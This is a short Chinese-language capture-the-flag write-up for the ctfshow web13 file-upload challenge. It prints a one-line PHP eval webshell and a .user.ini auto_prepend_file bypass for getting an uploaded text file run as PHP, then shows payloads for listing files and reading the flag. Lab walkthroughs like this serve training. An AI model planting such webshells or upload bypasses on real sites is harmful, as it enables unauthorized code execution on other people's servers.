一、靶场:ctfshow web13
二、解题步骤
步骤一:打开靶场,发现有文件上传的按钮,猜测是文件上传的洞,打开源码也没有其他提示
步骤二:先尝试上传一些文件
1、图片文件,但报错了,似乎太大了
2、再尝试上传一个空的php,显示后缀错误
3、尝试上传一个空文本,上传成功
4、那就尝试写一个最短的一句话木马:<?php eval($_GET[a]); 作为文本尝试上传,成功
步骤三:由前面的尝试可以得知图片马应该是不行了,大小限制了,那么这里尝试上传 .user.ini 和 .htaccess 文件去解析前面上传的木马文本,但由于大小问题 .htaccess 文件无法上传,那么这里尝试 .user.ini 看 ini 文件能否上传
内容:auto_prepend_file=1.txt
成功
步骤四:连接,使用payload:?a=print_r(glob("*")); 查看当前文件夹的文件
步骤五:flag应该在那个文件名很长的文件中,使用payload:?a=highlight_file(""); 查看文件内容,得到flag
注意事项:使用.user.ini的前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了